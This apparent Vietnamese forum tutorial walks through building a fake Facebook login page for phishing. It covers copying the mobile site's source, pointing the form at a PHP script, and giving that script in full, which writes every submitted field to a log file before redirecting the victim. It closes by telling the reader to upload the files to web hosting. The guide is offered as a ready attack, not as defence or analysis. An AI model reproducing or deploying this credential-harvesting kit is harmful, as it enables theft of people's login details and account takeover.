Phishing là gì?
Phishing là một kỹ thuật hack phổ biến và nguy hiểm để ăn cắp thông tin bí mật của mọi người bằng cách sử dụng các trang đăng nhập giả. Trong bài viết này mình sẽ cho bạn thấy làm thế nào để tạo ra các trang đăng nhập giả mạo đơn giản ( mình sẽ demo site facebook )

Để thực hiện điều này bạn cần tạo 3 file sau :

1) .html
2) .php
3) .txt


Bước 1:

Mở 1 trang web mà bạn muốn tạo fake login page. Ở đây mình dùng m.facebook.com cho đơn giản :
Click chuột fải và chọn xem nguồn trang ( view page source)
[You must be registered and logged in to see this image.]

Một tab mới hiện ra, bạn coppy toàn bộ nội dung ctrl + A và copy & paste nó vào notepad
Và bây giờ ấn Ctrl + F trong notepad và tìm từ "action", nó có dạng như hình dưới
[You must be registered and logged in to see this image.]

Còn bây giờ bạn hãy xóa toàn bộ nội dung trong dấu "ngoặc kép"
và thay vào đó là "mail.php"
Sau đó thay tiếp từ "post" thành "get"
[You must be registered and logged in to see this image.]
Xong rồi save file notepad này lại thành "facebook.html".
Nếu trong lúc save mà báo lỗi này thì bạn làm như sau:

Xem:

Bước 2:

Bạn mở notepad ra ra copy toàn bộ code ở dưới vào và save với tên là "mail.php"

Code:

<?php
header ('Location: Xin vui lòng đăng nhập hoặc đăng ký để xem liên kết ');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



trong code có đoạn link "Xin vui lòng đăng nhập hoặc đăng ký để xem liên kết"
Khi ai đó click vào chữ đăng nhập trên fake page của bạn thì sẽ được chuyển hướng sang cái link đó...bạn có thể chỉnh lại cái link đó tùy theo cách sử dụng của bạn.

Bước 3:

Tạo ra tiếp 1 file nữa là "log.txt" rồi để đó.
Vậy là xong...tiếp theo các bạn upload cả 3 file này nên 1 webhosting nào đó